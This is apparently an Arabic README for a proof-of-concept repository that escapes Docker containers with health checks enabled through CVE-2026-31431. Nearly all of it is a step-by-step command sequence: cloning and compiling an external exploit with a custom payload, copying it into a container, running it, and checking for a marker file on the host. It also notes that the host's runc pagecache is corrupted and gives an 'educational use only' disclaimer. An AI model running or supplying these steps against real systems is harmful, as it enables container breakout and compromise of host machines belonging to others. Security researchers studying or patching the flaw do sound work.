
# هروب الحاوية على أي حاوية Docker مع تفعيل فحص الصحة عبر CVE-2026-31431
https://github.com/user-attachments/assets/2cb0cb67-789a-4461-a0b8-1fe878d9426e
في هذا المستودع، يتم توفير ملف docker-compose.yml لإعداد حاوية معرّضة للثغرة. يمكنك أيضاً استخدام أي حاوية معرّضة أخرى أو إعداد حاوية خاصة بك، ولكن تذكر تعديل كود الاستغلال وفقاً لذلك.
# على الجهاز المضيف
rm -r copy-fail-c /tmp/pwned
docker-compose up -d
git clone https://github.com/tgies/copy-fail-c.git
cp payload.c copy-fail-c/
cd copy-fail-c && make && cp exploit ../ && cd ..
docker cp exp.sh copyfail:/tmp/
docker cp exploit copyfail:/tmp/
docker exec -it copyfail /bin/sh
# داخل حاوية copyfail
cd /tmp
chmod +x exp.sh exploit
./exp.sh
# انتظر بضع دقائق حتى يتم تنفيذ فحص الصحة
# وتحقق مما إذا تم إنشاء /tmp/pwned على المضيف
# على الجهاز المضيف
ls /tmp/pwned
بمجرد نجاح الاستغلال، يتم إتلاف ذاكرة التخزين المؤقت للصفحات (pagecache) لملف runc الثنائي على الجهاز المضيف. يمكنك استعادتها عن طريق تشغيل echo 3 | sudo tee /proc/sys/vm/drop_caches على المضيف.
هذا المستودع مخصص للأغراض التعليمية فقط. لا ينبغي استخدامه لأي أنشطة ضارة. المؤلف غير مسؤول عن أي ضرر ناتج عن سوء استخدام هذا الكود. استخدمه دائماً في بيئة خاضعة للتحكم وقانونية.